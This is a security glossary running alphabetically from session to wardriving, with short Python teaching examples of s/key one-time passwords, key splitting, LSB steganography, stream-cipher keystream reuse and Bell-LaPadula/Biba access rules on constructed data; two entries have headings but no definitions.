A session is a virtual connection between two hosts over which network traffic is passed. In web applications, a session is also the server-side state (held in variables and looked up by a session identifier sent with each request) that lets information be carried across multiple pages.
Secure hash algorithm 1 sha-1
Secure hash algorithm 1 (sha-1) is a cryptographic hash function designed by the united states national security agency and published by nist as a u.s. federal information processing standard. It produces a 160-bit digest. Practical collisions were demonstrated in 2017, and sha-1 is no longer acceptable for digital signatures or certificates; sha-2 or sha-3 should be used instead.
Shadow password files
Shadow password files are system files (for example /etc/shadow on linux) where hashed user passwords are stored, readable only by the root account, so that the hashes are not available to ordinary users or to people who try to break into the system. The world-readable /etc/passwd then holds only account information, not password hashes.
Share
A share is any resource that has been made public on a system or network, such as a directory (file share) or printer (printer share).
Shell
Shell is a unix term for the interactive user interface with an operating system. The shell is the layer of programming that recognises and executes the commands that a user enters. In some systems, the shell is called a command interpreter.
Signals analysis
Signals analysis is a process of gaining indirect knowledge of communicated data by monitoring and analysing a signal that is emitted by a system and that contains the data, but is not intended to communicate the data.
Signature
A signature is a distinct pattern in network traffic or file content that can be identified by a specific tool, such as an intrusion detection system or antivirus scanner.
Simple integrity property
The simple integrity property is the “no read down” rule of the biba integrity model: a subject cannot read data at a lower integrity level than its own, so that untrusted (low-integrity) data cannot contaminate higher-integrity processing. Its counterpart, the integrity star property, forbids writing to a higher integrity level.
Simple network management protocol snmp
Simple network management protocol (snmp) is an internet-standard protocol for managing devices on ip networks. Devices that typically support snmp include routers, switches, servers, workstations, printers, modem racks and more. Snmp is widely used in network management systems to monitor network-attached devices for conditions that warrant administrative attention. Snmp versions 1 and 2c authenticate requests with a community string sent in cleartext and should be confined to management networks; snmpv3 adds user authentication and encryption.
Simple security property
The simple security property is the “no read up” rule of the bell-lapadula confidentiality model: a subject cannot read data of a higher classification than its own clearance.
S/key
S/key is a one-time password mechanism developed for authentication to unix-like operating systems, particularly from dumb terminals or untrusted public computers. It applies a cryptographic hash function repeatedly to a secret to generate a chain of 64-bit one-time passwords, used in reverse order for remote login. Since each password is used only once, and the hash cannot be inverted to obtain the next password in the sequence, a password sniffer gains nothing reusable.
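The hash-chain idea behind s/key, as an added worked example that is not part of the glossary: the server stores only the last accepted password and its sequence number, and each login presents the previous element of the chain. This toy uses sha-256 truncated to 64 bits as the one-way step (real s/key folds md4 and encodes the result as six short words; both substitutions are assumptions of the example), and the passphrase, seed and chain length are constructed values.

```python
import hashlib
import hmac


def fold64(data: bytes) -> bytes:
    """One-way step of the chain: sha-256 truncated to 64 bits (an assumption
    of this example; real s/key uses a folded md4 digest)."""
    return hashlib.sha256(data).digest()[:8]


def otp(passphrase: str, seed: str, n: int) -> bytes:
    """n-th password of the chain: fold64 applied n times to fold64(seed + passphrase)."""
    x = fold64((seed + passphrase).encode())
    for _ in range(n):
        x = fold64(x)
    return x


class OtpServer:
    """Holds only the last accepted password and its sequence number,
    never the passphrase, so a stolen server record yields no future passwords."""

    def __init__(self, count: int, last_hash: bytes):
        self.count = count      # sequence number of the stored hash
        self.last = last_hash   # equals otp(count)

    def verify(self, presented: bytes) -> bool:
        # The client presents otp(count - 1). Hashing it once must reproduce
        # the stored value. A sniffer who captures it cannot invert fold64 to
        # obtain otp(count - 2), which is what the next login requires.
        if self.count <= 0:
            return False
        if not hmac.compare_digest(fold64(presented), self.last):
            return False
        self.count -= 1
        self.last = presented
        return True


def demo() -> list:
    """Enrolment with otp(5), then a login, a replay of the sniffed password,
    and the next legitimate login. Returns the three verdicts."""
    passphrase, seed, n = "correct horse battery", "ab12", 5   # constructed values
    server = OtpServer(n, otp(passphrase, seed, n))
    return [
        server.verify(otp(passphrase, seed, 4)),   # accepted
        server.verify(otp(passphrase, seed, 4)),   # replay: rejected
        server.verify(otp(passphrase, seed, 3)),   # accepted
    ]


if __name__ == "__main__":
    print(demo())
```

When the counter reaches zero the chain is exhausted and the user must re-enrol with a fresh seed; a real deployment would warn well before that point.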
Smart card
A smart card is a credential, usually the size of a credit card, containing an embedded integrated circuit that can store keys and certificates and perform cryptographic operations (such as signing a challenge) without releasing the private key. The card connects to a reader with direct physical contact or with a contactless radio frequency interface. Unlike a magnetic-stripe card, the stored secret is not simply read out and replayed.
S/mime
S/mime is a set of specifications for securing electronic mail. Secure/multipurpose internet mail extensions (s/mime) is based upon the widely used mime standard and describes a protocol for adding cryptographic security services through mime encapsulation of digitally signed and encrypted objects. The basic security services offered by s/mime are authentication, non-repudiation of origin, message integrity, and message privacy. Optional security services include signed receipts, security labels, secure mailing lists, and an extended method of identifying the signer’s certificate(s).
Smurf attack
A smurf attack is a distributed denial-of-service attack in which large numbers of internet control message protocol (icmp) echo requests with the intended victim’s spoofed source ip are sent to a network’s ip broadcast address. Most devices on that network reply to the spoofed source, so the victim receives one reply per host for every packet the attacker sent. This can overwhelm the victim’s link or system to the point where it becomes unusable. The attack relies on routers forwarding directed broadcasts; disabling directed-broadcast forwarding on routers and ignoring broadcast echo requests on hosts removes the amplification.
Sniffer
A sniffer is a tool that monitors network traffic that is received on a network interface.
Sniffing
Sniffing is also known as passive wiretapping. Packet sniffing allows individuals to capture data as it is transmitted over a network. Packet sniffer programs are used by network professionals to diagnose network issues and by malicious users to capture unencrypted data like passwords and usernames in network traffic. Once this information is captured, the user can then gain access to the system or network.
Social engineering
Social engineering is a non-technical attack technique that relies on human interaction and typically involves tricking people into breaking normal security procedures, for example by disclosing credentials or granting access.
Socket pair
A socket pair is the way to uniquely identify a connection, i.e., the 4-tuple of source ip address, source port, destination ip address and destination port (together with the transport protocol, which makes it a 5-tuple).
Socket
A socket is an endpoint for communication between two systems. The socket tells a host’s ip stack where to plug in a data stream so that it connects to the right application.
Socks
Socket secure (socks) is an internet protocol that routes network packets between a client and a server through a proxy server. Socks5 can require the client to authenticate before the proxy forwards traffic, so that only authorised users reach a server; socks4 has no such authentication. Socks uses sockets to represent and keep track of individual connections. The client side of socks is built into certain web browsers and the server side can be added to a proxy server.
Software
Software is any computer instructions, data, or programs that can be stored electronically and executed by computer hardware. While running any software, associated data that is stored in the hardware may be dynamically written or modified.
Source port
A source port is a port that a host uses to connect to a server. It is usually a number greater than or equal to 1024. It is randomly generated and is different each time a connection is established.
Spam
Spam is the term used for flooding the internet with many copies of the same message, in an attempt to force the message on individuals who would not otherwise choose to receive it. Most spam mails or messages are commercial advertising, often for dubious products, get-rich-quick schemes, or quasi-legal services.
Spanning port
A spanning port (switched port analyzer, or span, port) is a switch port configured to receive a copy of the traffic passing through one or more other ports or vlans, so that a sniffer or intrusion detection sensor attached to it sees traffic that the switch would otherwise deliver only to the destination port, much as a hub would.
Split horizon
A split horizon is an algorithm used to prevent routing loops in distance-vector routing protocols by prohibiting a router from advertising a route back onto the interface from which it was learned.
Split key
A split key is a cryptographic key that is divided into two or more separate data items that individually convey no knowledge of the whole key or information that results from combining the items.
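An added example, not from the glossary, of the simplest split-key scheme: an n-of-n xor split in which every share but the last is uniformly random, so any subset of fewer than n shares is statistically independent of the key. The 128-bit key value below is constructed for the demonstration.

```python
import secrets
from functools import reduce


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def split_key(key: bytes, n: int) -> list:
    """n-of-n split: n-1 shares are fresh random bytes; the last share is
    key xor (all other shares). Each share alone is just random data."""
    if n < 2:
        raise ValueError("need at least two shares")
    shares = [secrets.token_bytes(len(key)) for _ in range(n - 1)]
    shares.append(reduce(xor_bytes, shares, key))
    return shares


def combine(shares: list) -> bytes:
    """xor of all shares reproduces the key; with any share missing the
    result is uniformly random, i.e. carries no information about the key."""
    return reduce(xor_bytes, shares)


def demo() -> dict:
    key = bytes.fromhex("2b7e151628aed2a6abf7158809cf4f3c")   # constructed 128-bit key
    shares = split_key(key, 3)                                # e.g. three custodians
    return {
        "all_shares_recover_key": combine(shares) == key,
        "two_shares_recover_key": combine(shares[:2]) == key,   # false (prob. 2^-128)
    }


if __name__ == "__main__":
    print(demo())
```

For a threshold scheme (any k of n custodians suffice) a polynomial-based split such as shamir secret sharing is used instead; the xor split shown here requires every share.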
Spoof
A spoof is an attempt by an unauthorized entity to gain illegitimate access to a system by posing as an authorized user or host, for example by forging a source ip address, an email sender, or a caller’s identity.
Sql injection
Sql injection is a code injection technique used to attack data-driven applications, in which attacker-supplied input is concatenated into an sql statement so that it alters the statement’s structure instead of being treated as data. Parameterised queries (prepared statements), which pass values to the database separately from the query text, are the standard defence.
Stack smashing
Stack smashing is the act of overflowing a buffer on the call stack of an application or operating system so that data written past the end of the buffer overwrites adjacent stack contents, including the saved return address. This can crash the program or, if the overwritten return address points at attacker-controlled code, hijack its execution. The stack is a last-in, first-out region of memory that holds function parameters, local variables and return addresses.
Standard acls cisco
Standard access control lists (acls) are essentially a set of commands, grouped together by a number or name that is used to filter traffic entering or leaving an interface. Acls make packet filtering decisions based on source ip address only.
Star network
Star networks are one of the most common computer network topologies. A star network has a central node (a switch, hub or computer) to which every other node is connected; the central node provides a common connection point and relays messages between the nodes.
Star property
The star property (*-property) is the “no write down” rule of the bell-lapadula model: a subject cannot write data to a lower classification level than its own, which prevents a process running with a high clearance from leaking data to a lower level. A user who needs to write at a lower level must log in at that lower level.
State machine
A state machine is any device that stores the status of something at a given time and can operate on input to change the status and cause an action to take place for any given change. A computer is basically a state machine and each machine instruction is input that changes one or more states and may cause other actions to take place. Each computer’s data register stores a state. The read-only memory from which a boot program is loaded stores a state.
Stateful inspection
Stateful inspection is also known as dynamic packet filtering. It is a firewall technology that monitors the state of active connections and uses this information to determine which network packets to allow through the firewall.
Static host tables
Static host tables are text files that contain hostname and address mapping.
Static routing
Static routing is a form of routing in which a router uses manually configured routing entries rather than routes learned from a dynamic routing protocol. Static routing is commonly used in stub networks, or to provide a gateway of last resort.
Stealthing
Stealthing is a term that refers to approaches used by malicious code to conceal its presence on the infected system.
Steganalysis
Steganalysis is the study of detecting and defeating the use of steganography. This is analogous to cryptanalysis applied to cryptography.
Steganography
Steganography is a technique used to hide the existence of a message, file, or other information. The first recorded use of the term was in 1499 by Johannes Trithemius in his steganographia. It differs from cryptography, which hides the meaning of a message but not the fact that a message exists. Invisible ink is a classic example; a digital example is embedding data in the least significant bits of an image’s pixel values.
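An added example (not from the glossary) of least-significant-bit steganography over a constructed 8-bit “grayscale image”, serving both the steganography and steganalysis entries: the message is written into the low bit of successive bytes with a length prefix, so every pixel changes by at most one level, and a reader recovers it without any key. The cover data is a synthetic gradient, not a real image.

```python
def hide(cover: bytes, message: bytes) -> bytes:
    """Write message bits into the least significant bit of successive cover
    bytes, prefixed by a 32-bit big-endian length so the reader knows when to stop."""
    payload = len(message).to_bytes(4, "big") + message
    bits = [(byte >> (7 - i)) & 1 for byte in payload for i in range(8)]
    if len(bits) > len(cover):
        raise ValueError("cover too small for message")
    out = bytearray(cover)
    for i, bit in enumerate(bits):
        out[i] = (out[i] & 0xFE) | bit       # clear the low bit, then set it
    return bytes(out)


def reveal(stego: bytes) -> bytes:
    """Collect low bits back into bytes; first four bytes give the length."""
    def read_bytes(offset: int, count: int) -> bytes:
        result = bytearray()
        for b in range(count):
            value = 0
            for i in range(8):
                value = (value << 1) | (stego[offset + b * 8 + i] & 1)
            result.append(value)
        return bytes(result)

    length = int.from_bytes(read_bytes(0, 4), "big")
    return read_bytes(32, length)


def demo() -> dict:
    # Constructed cover: 512 "pixels" forming a smooth ramp (no real image data).
    cover = bytes((i * 7) % 256 for i in range(512))
    secret = b"meet at 2100"
    stego = hide(cover, secret)
    max_delta = max(abs(a - b) for a, b in zip(cover, stego))
    return {
        "revealed": reveal(stego),
        "max_delta": max_delta,                 # 1: visually indistinguishable
        "same_length": len(stego) == len(cover),
    }


if __name__ == "__main__":
    print(demo())
```

The weakness a steganalyst exploits is visible here too: the low bits of a natural image are not uniformly random, so statistical tests on the lsb plane (or a simple comparison against the original file, if it is available) reveal the embedding even though the picture looks unchanged.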
Stimulus
Stimulus is network traffic that initiates a connection or solicits a response.
Store and forward
Store-and-forward is a telecommunications technique in which information is sent to an intermediate station where it is kept and sent at a later time to the final destination or to another intermediate station.
Straight through cable
A straight-through cable is a type of twisted pair cable used in local area networks to connect unlike devices, such as a computer to a switch or router; a crossover cable is used between like devices. This type of cable is also called a patch cable, and a wired connection through it is the alternative to reaching the router over a wireless signal.
Stream cipher
A stream cipher is a symmetric key cipher where plaintext digits are combined with a pseudorandom cipher digit stream. In a stream cipher, each plaintext digit is encrypted one at a time with the corresponding digit of the keystream, to give a digit of the ciphertext stream.
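An added example, not from the glossary, of the stream-cipher construction and of its best-known failure mode. The keystream generator is a toy (sha-256 over key, nonce and a counter, an assumption of the example and not a vetted cipher; use chacha20 or aes in counter mode in practice), but the xor combining step and the consequence of reusing a keystream are exactly as in real stream ciphers: two ciphertexts made with the same key and nonce xor to the xor of their plaintexts. Key, nonce and messages are constructed.

```python
import hashlib


def keystream(key: bytes, nonce: bytes, length: int) -> bytes:
    """Toy keystream: sha-256(key || nonce || counter) blocks, counter mode.
    Illustrative only; the security point is in how the output is used."""
    out = bytearray()
    counter = 0
    while len(out) < length:
        out += hashlib.sha256(key + nonce + counter.to_bytes(8, "big")).digest()
        counter += 1
    return bytes(out[:length])


def xor_bytes(a: bytes, b: bytes) -> bytes:
    return bytes(x ^ y for x, y in zip(a, b))


def encrypt(key: bytes, nonce: bytes, plaintext: bytes) -> bytes:
    """Each plaintext byte is combined with the corresponding keystream byte."""
    return xor_bytes(plaintext, keystream(key, nonce, len(plaintext)))


decrypt = encrypt   # xor is its own inverse, so the same operation decrypts


def recover_second_plaintext(c1: bytes, c2: bytes, known_p1: bytes) -> bytes:
    """Keystream reuse: c1 ^ c2 == p1 ^ p2, so knowing p1 yields p2 without the key."""
    return xor_bytes(xor_bytes(c1, c2), known_p1)


def demo() -> dict:
    key = bytes.fromhex("00112233445566778899aabbccddeeff")   # constructed key
    nonce = b"nonce-01"
    p1, p2 = b"attack at dawn", b"hold the line!"             # constructed, equal length
    c1 = encrypt(key, nonce, p1)
    c2 = encrypt(key, nonce, p2)      # the mistake being demonstrated: same nonce
    return {
        "roundtrip_ok": decrypt(key, nonce, c1) == p1,
        "recovered_p2": recover_second_plaintext(c1, c2, p1),   # b"hold the line!"
        "fresh_nonce_ok": decrypt(key, b"nonce-02", encrypt(key, b"nonce-02", p2)) == p2,
    }


if __name__ == "__main__":
    print(demo())
```

The rule this enforces in practice: a (key, nonce) pair must never be used for two messages. Stream ciphers also offer no integrity on their own (flipping a ciphertext bit flips the same plaintext bit), so they are normally paired with a mac or used in an aead mode.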
Strong star property
In the strong star property, a subject can write data only at its own classification level, neither higher nor lower.
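As an added example (not part of the glossary), a small reference monitor that applies the four rules defined in the simple security, simple integrity, star and strong star entries. The level names and the subject/object pairs in the demonstration are constructed; the ordering is what matters.

```python
# Confidentiality levels (bell-lapadula) and integrity levels (biba) are totally
# ordered here; a higher number means more sensitive / more trustworthy.
CLASSIFICATION = {"unclassified": 0, "confidential": 1, "secret": 2, "top_secret": 3}
INTEGRITY = {"low": 0, "medium": 1, "high": 2}


def blp_read(subject: str, obj: str) -> bool:
    """Simple security property: no read up."""
    return CLASSIFICATION[subject] >= CLASSIFICATION[obj]


def blp_write(subject: str, obj: str, strong: bool = False) -> bool:
    """Star property: no write down. Strong star: write only at own level."""
    if strong:
        return CLASSIFICATION[subject] == CLASSIFICATION[obj]
    return CLASSIFICATION[subject] <= CLASSIFICATION[obj]


def biba_read(subject: str, obj: str) -> bool:
    """Simple integrity property: no read down (do not consume low-integrity data)."""
    return INTEGRITY[subject] <= INTEGRITY[obj]


def biba_write(subject: str, obj: str) -> bool:
    """Integrity star property: no write up (do not contaminate high-integrity data)."""
    return INTEGRITY[subject] >= INTEGRITY[obj]


def check(model: str, op: str, subject: str, obj: str, strong: bool = False) -> bool:
    """Reference-monitor entry point: True if the access is permitted."""
    rules = {
        ("blp", "read"): lambda: blp_read(subject, obj),
        ("blp", "write"): lambda: blp_write(subject, obj, strong),
        ("biba", "read"): lambda: biba_read(subject, obj),
        ("biba", "write"): lambda: biba_write(subject, obj),
    }
    return rules[(model, op)]()


def demo() -> list:
    """Constructed accesses showing each rule allowing and denying."""
    return [
        ("secret subject reads confidential object", check("blp", "read", "secret", "confidential")),
        ("confidential subject reads secret object", check("blp", "read", "confidential", "secret")),
        ("secret subject writes top_secret object", check("blp", "write", "secret", "top_secret")),
        ("secret subject writes confidential object", check("blp", "write", "secret", "confidential")),
        ("strong star: secret subject writes top_secret", check("blp", "write", "secret", "top_secret", strong=True)),
        ("high-integrity process reads low-integrity input", check("biba", "read", "high", "low")),
        ("low-integrity process writes high-integrity file", check("biba", "write", "low", "high")),
    ]


if __name__ == "__main__":
    for description, allowed in demo():
        print("ALLOW" if allowed else "DENY ", description)
```

Read together, the two models pull in opposite directions: bell-lapadula lets information flow upward in sensitivity, biba lets it flow downward in trust. Real systems that need both (for example a mandatory access control policy on a server) label objects with a confidentiality level and an integrity level independently and evaluate both checks.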
Sub network
A sub network is a separately identifiable part of a larger network that typically represents a certain limited number of host computers, the hosts in a building or geographic area, or the hosts on an individual local area network.
Subnet mask
A subnet mask is a 32-bit value that determines which bits of an ip address identify the network (and subnet) and which identify the host. A host or router applies the mask to a destination address to decide whether the destination is on the local subnet or must be sent to a gateway; once a packet has arrived at the gateway for its network number, it can be routed to its destination within the internal gateways using the subnet number.
Switch
A switch, also called a switching hub, bridging hub or, officially, a mac bridge, is a computer networking device that connects devices together on a computer network by using packet switching to receive, process and forward data to the destination device.
Switched network
A switched network (fully switched network) is a computer network that uses only network switches rather than network hubs on ethernet local area networks. The switches provide a dedicated connection to each workstation, so many conversations can occur simultaneously.
Symbolic links
Symbolic links are sometimes also known as symlinks. A symbolic link is essentially an advanced shortcut: a file that holds the path of another file or directory, to which the operating system redirects accesses. Because a link can point anywhere, a privileged program that follows links in a directory writable by others can be tricked into reading or overwriting files the link’s creator could not otherwise reach.
Symmetric cryptography
Symmetric cryptography is a branch of cryptography involving algorithms that use the same key for both encryption and decryption. It is also called secret-key cryptography because the communicating parties must share, and keep secret, that key.
Symmetric key
A symmetric key is a cryptographic key that is used in a symmetric cryptographic algorithm.
Syn flood
A syn flood is a type of denial-of-service attack in which an attacker sends a succession of syn requests, often from spoofed source addresses, to a target system in an attempt to fill its table of half-open connections and make the system unresponsive to legitimate traffic. Syn cookies and connection-rate limiting are the usual mitigations.
Synchronization
Synchronization, in networking, is a distinctive pattern of bits (the preamble) that network hardware looks for to recognise the start of a frame. In computing more generally, synchronization refers to one of two distinct but related concepts: synchronization of processes, and synchronization of data.
Syslog
Syslog is a widely used standard (rfc 3164, later rfc 5424) for message logging on unix systems. It permits separation of the software that generates messages, the system that stores them, and the software that reports on and analyses them. Traditional syslog transport is udp port 514 in cleartext, with no delivery guarantee or integrity protection; tls transport should be used when logs cross untrusted networks.
System security officer sso
A system security officer (sso) is an individual responsible for enforcement or administration of the security policy that applies to the system.
System specific policy
A system-specific policy is a policy written for a specific system or device and may change with changes in the system or device, its functionality, or its vulnerabilities.
T1 t3
A t1 or t3 is a digital circuit using tdm (time-division multiplexing); a t1 carries 1.544 mbit/s and a t3 44.736 mbit/s.
Tamper
Tamper is defined as deliberately trying to change or alter a system’s logic, data, or control information to cause the system to perform unauthorized functions or services.
Tcp fingerprinting
Tcp/ip stack fingerprinting is the collection of configuration attributes from a remote device, either passively by observing its normal traffic or actively by sending crafted probes, during standard layer 4 network communications. The combination of parameters (such as initial ttl, window size and tcp options) may be used to infer the remote machine’s operating system (os), or incorporated into a device fingerprint.
Tcp full open scan
A tcp full open (connect) scan performs a complete three-way handshake on each probed port to determine whether it is open, and is therefore logged by the target application like any other connection.
Tcp half open scan
A tcp half open scan determines if a port is open by performing only the first half of a three-way handshake. It is also referred to as syn scanning. In syn scanning, the scanner sends a syn (synchronization) packet, as if to initiate a three-way handshake, to every port of interest on the server. A syn/ack reply means the port is open and a rst means it is closed; the scanner then sends a rst instead of completing the handshake, so the listening application never sees a connection.
Tcp wrapper
A tcp wrapper is a software package that is used to restrict access to certain network services based on the source of the connection. In other words, it is a host-based networking acl system, used to filter network access to internet protocol servers on (unix-like) operating systems such as gnu/linux or bsd.
Tcpdump
Tcpdump is an open-source protocol analyzer for unix systems that can monitor network traffic on a wire. It allows the user to display tcp/ip and other packets being transmitted or received over a network. Tcpdump works on most unix-like operating systems: linux, solaris, bsd, os x, hp-ux, android and aix among others. It was originally written in 1987 by van jacobson, craig leres and steven mccanne, who were working in the lawrence berkeley laboratory network research group.
Tcp ip
Tcp/ip stands for transmission control protocol/internet protocol. It is a basic communication language or protocol of the internet and can be used as a communications protocol in a private network as well (either an intranet or an extranet).
Telnet
Telnet is a tcp-based, application-layer, internet standard protocol for accessing remote computers. Through telnet, an administrator or another user can access a computer remotely. Telnet transmits everything, including usernames and passwords, in cleartext, so it has been superseded by ssh for remote administration.
Threat agent
Threat assessment
Threat assessment is a structured process used to identify and evaluate various risks or threats that an organization might be exposed to.
Threat model
A threat model is the output of threat modeling, a process used to improve security by identifying the key assets, entry points and vulnerabilities of a system or network and then defining countermeasures to prevent, or mitigate the effects of, threats to it.
Threat vector
A threat vector is a methodology that a threat uses to get to the target.
Threat
A threat is a possible danger that might exploit a vulnerability to violate security policy and thus cause harm. A threat can be deliberate (for example, an individual cracker or a criminal organization), accidental (for example, the possibility of a computer malfunctioning, or of a natural disaster such as an earthquake, a fire, or a tornado), or otherwise a circumstance, capability, action, or event.
Time to live
Time to live (ttl) or the hop limit is a mechanism that limits the lifespan of data in a computer or network. Ttl is generally implemented as a counter or time stamp attached to or embedded in the data. Ttl value in an ip data packet tells a network router whether or not the packet has been in the network too long and should be discarded.
Tiny fragment attack
A tiny fragment attack abuses ip fragmentation, the process of breaking a single internet protocol (ip) datagram into multiple smaller packets. Every network link has a characteristic maximum size of messages that may be transmitted, called the maximum transmission unit (mtu). If the first fragment is made small enough to force some of a tcp packet’s header fields into the second fragment, filter rules that match on those fields will not match. If the filtering implementation does not enforce a minimum fragment size, a disallowed packet might be passed because it did not hit a match in the filter. Std 5, rfc 791 states that “every internet module must be able to forward a datagram of 68 octets without further fragmentation”, because an internet header may be up to 60 octets and the minimum fragment is 8 octets. Ip fragmentation exploits (attacks) use the fragmentation mechanism within ip as an attack vector.
Token based access control
Token-based access control is an authentication method that offers additional security. Using this method, each user has a smart card or token that either displays a constantly changing password, passkey, or buttons that calculate a new password based on a challenge phrase. Without this card or token, it is impossible to authenticate yourself to the system. This two-factor authentication provides additional security by requiring an attacker to both guess the user’s password and steal the smart card or token that is used to access the system.
Token based devices
A token-based device or a security token is known by several names such as, hardware token, authentication token, usb token, cryptographic token, software token, virtual token, or key fob. A security token may be a physical device that an authorized user is given to access a system or network. Security tokens are used to prove one’s identity electronically and are used in addition to or in place of a password to prove that the customer is who they claim to be. The token acts like an electronic key to access something.
Token ring
A token ring network is a local area network in which all computers are connected in a ring or star topology and a binary digit or token-passing scheme is used in order to prevent the collision of data between two computers that want to send messages at the same time. It uses a special three-byte frame called a “token” that travels around a logical “ring” of workstations or servers.
Topology
Topology is the geometric arrangement of a computer system. Common topologies include a bus, star, and ring. Two networks have the same topology if the connection configuration is the same, although the networks may differ in physical interconnections, distances between nodes, transmission rates, and/or signal types.
Traceroute tracert exe
Traceroute is a tool that maps the route a packet takes from the local machine to a remote destination. It sends probes with increasing time-to-live values; each router that decrements the ttl to zero returns an icmp time exceeded message, revealing its address. The output lists, for each successive hop (remote node) in the path, the round-trip times of the probes answered by that hop.
Transmission control protocol tcp
Transmission control protocol (tcp) is a set of rules or protocol that is used along with the internet protocol to send data in the form of message units between computers over the internet. Whereas the ip protocol deals only with packets, tcp enables two hosts to establish a connection and exchange streams of data. Tcp takes care of keeping track of the individual units of data called packets. Tcp guarantees delivery of data and also guarantees that packets will be delivered in the same order in which they were sent. It originated in the initial network implementation in which it complemented the internet protocol (ip). Therefore, the entire suite is commonly referred to as tcp/ip.
Transport layer security tls
Transport layer security (tls) is a protocol that ensures privacy between communicating applications and the users on the internet. When a server and client communicate, tls ensures that no third party may overhear or tamper with any message. Tls is the successor to the secure sockets layer (ssl).
Triple des
Triple des (3des) is the common name for the triple data encryption algorithm (tdea or triple dea) symmetric-key block cipher, which applies the data encryption standard (des) cipher algorithm three times to each data block. It transforms each 64-bit plaintext block by applying des three successive times, using either two or three different keys, for a nominal key length of 112 or 168 bits (the two-key variant provides only about 80 bits of security because of meet-in-the-middle attacks). Its 64-bit block size makes long sessions vulnerable to birthday attacks, and nist has retired 3des; aes should be used instead.
Triple wrapped
Triple wrapped describes data that has been signed with a digital signature, then encrypted, and then signed again.
Trojan horse
A trojan horse is a computer program that appears to have a useful function, but also has a hidden and potentially malicious function that evades security mechanisms, sometimes by exploiting legitimate authorization of a system entity that invokes the program.
Trunking
Trunking is a method for a system to provide network access to many clients by sharing a set of lines or frequencies instead of providing them individually. This is analogous to the structure of a tree with one trunk and many branches. On ethernet switches, a trunk is a link that carries traffic for several vlans, each frame tagged (ieee 802.1q) with the vlan it belongs to.
Trust
Trust is a relationship in which one system or domain accepts the authentication and authorization decisions of another; it determines which permissions and what actions users or systems from the trusted party can exercise on remote machines.
Trusted certificate
A trusted certificate is any digital certificate that a certificate user accepts as being valid without testing the certificate to validate it as the final certificate on a certification path; especially a certificate that is used as a trust anchor certificate.
Trusted ports
Trusted (privileged) ports are port numbers below 1024 that, on unix-like systems, only the root user (or, on linux, a process holding the cap_net_bind_service capability) is allowed to bind.
Tunnel
A tunnel is a communication channel that is created in a computer network by encapsulating a communication protocol’s data packets in a second protocol that normally would be carried above, or at the same layer as, the first one. Most often, a tunnel is a logical point-to-point link created by encapsulating the layer 2 protocol in a transport protocol (such as tcp), in a network or inter-network layer protocol (such as ip), or in another link layer protocol. Tunneling can move data between computers that use a protocol not supported by the network connecting them.
Udp scan
A udp scan determines which udp ports are open. Udp is a connectionless protocol, so there is no equivalent of a tcp syn packet. However, if a udp packet is sent to a port that is not open, the system will respond with an icmp port unreachable message. A port that returns no response is reported as open or filtered, since an open udp service may simply not reply to an empty probe and a firewall may drop the packet silently; icmp rate limiting on the target also makes udp scans slow.
Unicast
Unicast is defined as any communication between a single sender and a single receiver over a network. The term exists in contrast to multicast, communication between a single sender and multiple receivers, and anycast, communication between a sender and the nearest of a group of receivers in a network.
Uniform resource identifier uri
A uniform resource identifier (uri) is a string of characters that are used to identify the name of a resource. Such identification enables interaction with representations of the resource over a network (such as the world wide web) using specific protocols. In other words, uri is the generic term for all types of names and addresses that refer to objects on the world wide web.
Uniform resource locator url
A uniform resource locator (url) is the global address of documents and other resources on the world wide web. The first part of the address indicates what protocol to use, and the second part specifies the ip address or the domain name where the resource is located. A url is a specific type of uniform resource identifier (uri), although many people use the two terms interchangeably. A url implies the means to access an indicated resource, which is not true of every uri. Urls occur most commonly to reference web pages (http), but are also used for file transfer (ftp), email (mailto), database access (jdbc), and many other applications.
Unix
Unix is a popular multi-user, multi-tasking operating system developed at bell labs in the early 1970s by ken thompson, dennis ritchie, and others. Unix was designed to be a small, flexible system used initially by programmers.
Unprotected share
An unprotected share is a mechanism that allows a user to connect to file systems and printers on other systems. An unprotected share is one that allows anyone to connect to it.
User contingency plan
A user contingency plan is the alternative method of continuing business operations if its systems are unavailable.
User datagram protocol udp
The user datagram protocol (udp) is a communication protocol that, like tcp, runs on top of ip networks. The protocol was designed by david p. Reed in 1980 and formally defined in rfc 768. Udp uses a simple connectionless transmission model with a minimum of protocol mechanism. Udp uses the internet protocol to get a datagram from one computer to another but does not establish a connection, split a message into smaller units, reassemble them at the other end, or retransmit lost datagrams, and it does not guarantee that datagrams arrive in order. It is used for services such as dns, streaming media and broadcast or multicast messaging where low overhead matters more than reliability. Because a udp source address is unauthenticated, udp services are a common vehicle for spoofed-source amplification attacks.
User
A user is any person, organization entity, or automated process that accesses a system, whether authorized to do so or not. Users generally use a system or a software product without the technical expertise required to fully understand it.
Virtual private network vpn
A virtual private network (vpn) extends a private network across a public network, such as the internet. Vpn enables users to send and receive data across shared or public networks as if their computing devices were directly connected to the private network. A vpn is created by establishing a virtual point-to-point connection through the use of dedicated connections, virtual tunneling protocols, or traffic encryption. For example, if a corporation has lans at several different sites, each connected to the internet by a firewall, the corporation could create a vpn by (a) using encrypted tunnels to connect from firewall to firewall across the internet and (b) not allowing any other traffic through the firewalls. A vpn is generally less expensive to build and operate than a dedicated real network, because the virtual network shares the cost of system resources with other users of the real network.
Virus
A virus is a hidden, self-replicating section of computer software or a program, usually malicious logic, that propagates by infecting, i.e., inserting a copy of itself into and becoming part of, another program. A virus cannot run by itself and requires that its host program be run to make the virus active.
Voice firewall
A voice firewall is a physical discontinuity in a voice network that monitors, alerts on, and controls inbound and outbound voice network activity based on user-defined call admission control (CAC) policies, voice application layer security threats, or unauthorized service use violations.
Voice intrusion prevention system (VIPS)
A voice intrusion prevention system (VIPS) is a security management system for voice networks that monitors voice traffic for multiple calling patterns or attack/abuse signatures to proactively detect and prevent toll fraud, denial of service, telecom attacks, service abuse, and other anomalous activities.
War chalking
War chalking is marking areas, usually on sidewalks with chalk, that receive wireless signals, in order to advertise an open Wi-Fi network. Warchalking was inspired by hobo symbols and was conceived by a group of friends in June 2002. The symbols were published by Matt Jones, who designed the set of icons and produced a downloadable document containing them.
War dialer
A war dialer is a computer program that automatically dials a series of telephone numbers to locate lines connected to computer systems, and catalogs those numbers so that a cracker or attacker can try to break into the systems.
War dialing
War dialing is a technique of using a modem to automatically scan a list of telephone numbers, usually dialing every number in a local area code to search for computers, bulletin board systems (computer servers), and fax machines.
Wardriving
Wardriving is searching for Wi-Fi wireless networks by an individual in a moving vehicle while using a portable computer, smartphone, or personal digital assistant (PDA).
Web of trust
